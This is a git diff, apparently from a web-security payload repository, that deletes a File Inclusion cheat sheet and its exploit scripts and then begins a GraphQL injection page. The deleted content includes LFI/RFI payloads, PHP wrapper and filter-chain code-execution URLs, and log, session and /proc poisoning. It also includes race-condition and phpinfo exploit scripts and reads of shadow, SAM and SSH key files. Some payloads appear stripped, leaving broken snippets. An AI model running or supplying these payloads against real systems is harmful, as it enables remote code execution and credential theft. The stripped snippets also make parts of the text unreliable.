- -1. Create a share open to everyone -2. Write a PHP code inside a file : `shell.php` -3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` - - -## LFI / RFI using wrappers - -### Wrapper php://filter - -The part "`php://filter`" is case insensitive - -```powershell -http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php -http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php -http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php -http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php -``` - -Wrappers can be chained with a compression wrapper for large files. - -```powershell -http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd -``` - -NOTE: Wrappers can be chained multiple times using `|` or `/`: -- Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s` -- deflate then `base64encode` (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php` - -```powershell -./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page -curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php -``` - -Also there is a way to turn the `php://filter` into a full RCE. - -* [synacktiv/php_filter_chain_generator](https://github.com/synacktiv/php_filter_chain_generator) - A CLI to generate PHP filters chain - ```powershell - $ python3 php_filter_chain_generator.py --chain '' - [+] The following gadget chain will generate the following code : (base64 value: PD9waHAgcGhwaW5mbygpOz8+) - php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.UCS-2.UTF8|convert.iconv.L6.UTF8|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp - ``` -* [LFI2RCE.py](./LFI2RCE.py) to generate a custom payload. - ```powershell - # vulnerable file: index.php - # vulnerable parameter: file - # executed command: id - # executed PHP code: - curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd" - ``` - - -### Wrapper zip:// - -1. Create an evil payload: `echo "
" > payload.php;` -2. Zip the file - ```python - zip payload.zip payload.php; - mv payload.zip shell.jpg; - rm payload.php - ``` -3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php - - -### Wrapper data:// - -```powershell -http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= -NOTE: the payload is "" -``` - -Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+` - - -### Wrapper expect:// - -```powershell -http://example.com/index.php?page=expect://id -http://example.com/index.php?page=expect://ls -``` - - -### Wrapper input:// - -Specify your payload in the POST parameters, this can be done with a simple `curl` command. - -```powershell -curl -X POST --data "" "https://example.com/index.php?page=php://input%00" -k -v -``` - -Alternatively, Kadimus has a module to automate this attack. - -```powershell -./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input -``` - - -### Wrapper phar:// - -Create a phar file with a serialized object in its meta-data. - -```php -// create new Phar -$phar = new Phar('test.phar'); -$phar->startBuffering(); -$phar->addFromString('test.txt', 'text'); -$phar->setStub(''); - -// add object of any class as meta data -class AnyClass {} -$object = new AnyClass; -$object->data = 'rips'; -$phar->setMetadata($object); -$phar->stopBuffering(); -``` - -If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked - -```php -class AnyClass { - function __destruct() { - echo $this->data; - } -} -// output: rips -include('phar://test.phar'); -``` - -NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. - - -## LFI to RCE via /proc/*/fd - -1. Upload a lot of shells (for example : 100) -2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) - -## LFI to RCE via /proc/self/environ - -Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file - -```powershell -GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1 -User-Agent: -``` - - -## LFI to RCE via upload - -If you can upload a file, just inject the shell payload in it (e.g : `` ). - -```powershell -http://example.com/index.php?page=path/to/uploaded/file.png -``` - -In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf - - -## LFI to RCE via upload (race) -Worlds Quitest Let's Play" -* Upload a file and trigger a self-inclusion. -* Repeat 1 a shitload of time to: -* increase our odds of winning the race -* increase our guessing odds -* Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6} -* Enjoy our shell. - -```python -import itertools -import requests -import sys - -print('[+] Trying to win the race') -f = {'file': open('shell.php', 'rb')} -for _ in range(4096 * 4096): - requests.post('http://target.com/index.php?c=index.php', f) - - -print('[+] Bruteforcing the inclusion') -for fname in itertools.combinations(string.ascii_letters + string.digits, 6): - url = 'http://target.com/index.php?c=/tmp/php' + fname - r = requests.get(url) - if 'load average' in r.text: # ` as `?`) in LFI paths on Windows. - -* Upload a file, it should be stored in the temp folder `C:\Windows\Temp\`. -* Include it using `http://site/vuln.php?inc=c:\windows\temp\php<<` - - -## LFI to RCE via phpinfo() - -PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**. - -> By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name. - -Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) - -Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf - -## LFI to RCE via controlled log file - -Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file. - -```powershell -http://example.com/index.php?page=/var/log/apache/access.log -http://example.com/index.php?page=/var/log/apache/error.log -http://example.com/index.php?page=/var/log/apache2/access.log -http://example.com/index.php?page=/var/log/apache2/error.log -http://example.com/index.php?page=/var/log/nginx/access.log -http://example.com/index.php?page=/var/log/nginx/error.log -http://example.com/index.php?page=/var/log/vsftpd.log -http://example.com/index.php?page=/var/log/sshd.log -http://example.com/index.php?page=/var/log/mail -http://example.com/index.php?page=/var/log/httpd/error_log -http://example.com/index.php?page=/usr/local/apache/log/error_log -http://example.com/index.php?page=/usr/local/apache2/log/error_log -``` - -### RCE via SSH - -Try to ssh into the box with a PHP code as username ``. - -```powershell -ssh @10.10.10.10 -``` - -Then include the SSH log files inside the Web Application. - -```powershell -http://example.com/index.php?page=/var/log/auth.log&cmd=id -``` - -### RCE via Mail - -First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. - -```powershell -root@kali:~# telnet 10.10.10.10. 25 -Trying 10.10.10.10.... -Connected to 10.10.10.10.. -Escape character is '^]'. -220 straylight ESMTP Postfix (Debian/GNU) -helo ok -250 straylight -mail from: mail@example.com -250 2.1.0 Ok -rcpt to: root -250 2.1.5 Ok -data -354 End data with . -subject: -data2 -. -``` - -In some cases you can also send the email with the `mail` command line. - -```powershell -mail -s "" www-data@10.10.10.10. < /dev/null -``` - -### RCE via Apache logs - -Poison the User-Agent in access logs: - -``` -$ curl http://example.org/ -A "" -``` - -Note: The logs will escape double quotes so use single quotes for strings in the PHP payload. - -Then request the logs via the LFI and execute your command. - -``` -$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id -``` - -## LFI to RCE via PHP sessions - -Check if the website use PHP Session (PHPSESSID) - -```javascript -Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ -Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly -``` - -In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/session/sess_[PHPSESSID] files - -```javascript -/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. -user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; -``` - -Set the cookie to `` - -```powershell -login=1&user=&pass=password&lang=en_us.php -``` - -Use the LFI to include the PHP session file - -```powershell -login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 -``` - -## LFI to RCE via credentials files - -This method require high privileges inside the application in order to read the sensitive files. - -### Windows version - -First extract `sam` and `system` files. - -```powershell -http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam -http://example.com/index.php?page=../../../../../../WINDOWS/repair/system -``` - -Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. - -### Linux version - -First extract `/etc/shadow` files. - -```powershell -http://example.com/index.php?page=../../../../../../etc/shadow -``` - -Then crack the hashes inside in order to login via SSH on the machine. - -Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id_rsa. -If SSH is active check which user is being used `/proc/self/status` and `/etc/passwd` and try to access `//.ssh/id_rsa`. - -## References - -* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) -* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) -* [Turning LFI to RFI](https://l.avala.mp/?p=241) -* [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html) -* [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) -* [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) -* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) -* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) -* [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) -* [Чтение файлов => unserialize !](https://web.archive.org/web/20200809082021/https://rdot.org/forum/showthread.php?t=4379) -* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) -* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) -* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) -* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) -* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) -* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376) -* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters) -* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) -* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html) \ No newline at end of file diff --git a/File Inclusion/phpinfolfi.py b/File Inclusion/phpinfolfi.py deleted file mode 100644 index c369232..0000000 --- a/File Inclusion/phpinfolfi.py +++ /dev/null @@ -1,196 +0,0 @@ -#!/usr/bin/python -# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf -# The following line is not required but supposedly optimizes code. -# However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert. -# from builtins import range -from __future__ import print_function -import sys -import threading -import socket - -def setup(host, port): - TAG="Security Test" - PAYLOAD="""%s\r -');?>\r""" % TAG - REQ1_DATA="""-----------------------------7dbff1ded0714\r -Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r -Content-Type: text/plain\r -\r -%s ------------------------------7dbff1ded0714--\r""" % PAYLOAD - padding="A" * 5000 - REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r -Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r -HTTP_ACCEPT: """ + padding + """\r -HTTP_USER_AGENT: """+padding+"""\r -HTTP_ACCEPT_LANGUAGE: """+padding+"""\r -HTTP_PRAGMA: """+padding+"""\r -Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r -Content-Length: %s\r -Host: %s\r -\r -%s""" %(len(REQ1_DATA),host,REQ1_DATA) - #modify this to suit the LFI script - LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r -User-Agent: Mozilla/4.0\r -Proxy-Connection: Keep-Alive\r -Host: %s\r -\r -\r -""" - return (REQ1, TAG, LFIREQ) - -def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - s.connect((host, port)) - s2.connect((host, port)) - - s.send(phpinforeq) - d = "" - while len(d) < offset: - d += s.recv(offset) - try: - i = d.index("[tmp_name] =>") - fn = d[i+17:i+31] - except ValueError: - return None - - s2.send(lfireq % (fn, host)) - d = s2.recv(4096) - s.close() - s2.close() - - if d.find(tag) != -1: - return fn - -counter=0 -class ThreadWorker(threading.Thread): - def __init__(self, e, l, m, *args): - threading.Thread.__init__(self) - self.event = e - self.lock = l - self.maxattempts = m - self.args = args - - def run(self): - global counter - while not self.event.is_set(): - with self.lock: - if counter >= self.maxattempts: - return - counter+=1 - - try: - x = phpInfoLFI(*self.args) - if self.event.is_set(): - break - if x: - print("\nGot it! Shell created in /tmp/g") - self.event.set() - - except socket.error: - return - - -def getOffset(host, port, phpinforeq): - """Gets offset of tmp_name in the php output""" - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((host,port)) - s.send(phpinforeq) - - d = "" - while True: - i = s.recv(4096) - d+=i - if i == "": - break - # detect the final chunk - if i.endswith("0\r\n\r\n"): - break - s.close() - i = d.find("[tmp_name] =>") - if i == -1: - raise ValueError("No php tmp_name in phpinfo output") - - print("found %s at %i" % (d[i:i+10],i)) - # padded up a bit - return i+256 - -def main(): - - print("LFI With PHPInfo()") - print("-=" * 30) - - if len(sys.argv) < 2: - print("Usage: %s host [port] [threads]" % sys.argv[0]) - sys.exit(1) - - try: - host = socket.gethostbyname(sys.argv[1]) - except socket.error as e: - print("Error with hostname %s: %s" % (sys.argv[1], e)) - sys.exit(1) - - port=80 - try: - port = int(sys.argv[2]) - except IndexError: - pass - except ValueError as e: - print("Error with port %d: %s" % (sys.argv[2], e)) - sys.exit(1) - - poolsz=10 - try: - poolsz = int(sys.argv[3]) - except IndexError: - pass - except ValueError as e: - print("Error with poolsz %d: %s" % (sys.argv[3], e)) - sys.exit(1) - - print("Getting initial offset...", end=' ') - reqphp, tag, reqlfi = setup(host, port) - offset = getOffset(host, port, reqphp) - sys.stdout.flush() - - maxattempts = 1000 - e = threading.Event() - l = threading.Lock() - - print("Spawning worker pool (%d)..." % poolsz) - sys.stdout.flush() - - tp = [] - for i in range(0,poolsz): - tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag)) - - for t in tp: - t.start() - try: - while not e.wait(1): - if e.is_set(): - break - with l: - sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts)) - sys.stdout.flush() - if counter >= maxattempts: - break - print() - if e.is_set(): - print("Woot! \m/") - else: - print(":(") - except KeyboardInterrupt: - print("\nTelling threads to shutdown...") - e.set() - - print("Shuttin' down...") - for t in tp: - t.join() - -if __name__=="__main__": - print("Don't forget to modify the LFI URL") - main() diff --git a/File Inclusion/uploadlfi.py b/File Inclusion/uploadlfi.py deleted file mode 100644 index 93526d5..0000000 --- a/File Inclusion/uploadlfi.py +++ /dev/null @@ -1,22 +0,0 @@ -from __future__ import print_function -from builtins import range -import itertools -import requests -import string -import sys - -print('[+] Trying to win the race') -f = {'file': open('shell.php', 'rb')} -for _ in range(4096 * 4096): - requests.post('http://target.com/index.php?c=index.php', f) - - -print('[+] Bruteforcing the inclusion') -for fname in itertools.combinations(string.ascii_letters + string.digits, 6): - url = 'http://target.com/index.php?c=/tmp/php' + fname - r = requests.get(url) - if 'load average' in r.text: # GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type - - -## Summary - -- [GraphQL injection](#graphql-injection) - - [Summary](#summary) - - [Tools](#tools) - - [Exploit](#exploit) - - [Identify an injection point](#identify-an-injection-point) - - [Enumerate Database Schema via Introspection](#enumerate-database-schema-via-introspection) - - [List path](#list-path) - - [Extract data](#extract-data) - - [Extract data using edges/nodes](#extract-data-using-edgesnodes) - - [Extract data using projections](#extract-data-using-projections) - - [Enumerate the types' definition](#enumerate-the-types-definition) - - [Use mutations](#use-mutations) - - [NOSQL injection](#nosql-injection) - - [SQL injection](#sql-injection) - - [GraphQL Batching Attacks](#graphql-batching-attacks) - - [References](#references) - -## Tools - -* [swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) - Scripting engine to interact with a graphql endpoint for pentesting purposes -* [doyensec/graph-ql](https://github.com/doyensec/graph-ql/) - GraphQL Security Research Material -* [doyensec/inql](https://github.com/doyensec/inql) - A Burp Extension for GraphQL Security Testing -* [dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum) - Lists the different ways of reaching a given type in a GraphQL schema -* [andev-software/graphql-ide](https://github.com/andev-software/graphql-ide) - An extensive IDE for exploring GraphQL API's -* [mchoji/clairvoyancex](https://github.com/mchoji/clairvoyancex) - Obtain GraphQL API schema despite disabled introspection -* [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility -* [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations -* [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs -* [IvanGoncharov/graphql-voyager)](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph -* [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client - -## Exploit - -### Identify an injection point - -Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint. - -```js -example.com/graphql?query={__schema{types{name}}} -example.com/graphiql?query={__schema{types{name}}} -``` - -Check if errors are visible. - -```javascript -?query={__schema} -?query={} -?query={thisdefinitelydoesnotexist} -``` - - -### Enumerate Database Schema via Introspection - -URL encoded query to dump the database schema. - -```js -fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}} -``` - -URL decoded query to dump the database schema. - -```javascript -fragment FullType on __Type { - kind - name - description - fields(includeDeprecated: true) { - name - description - args { - 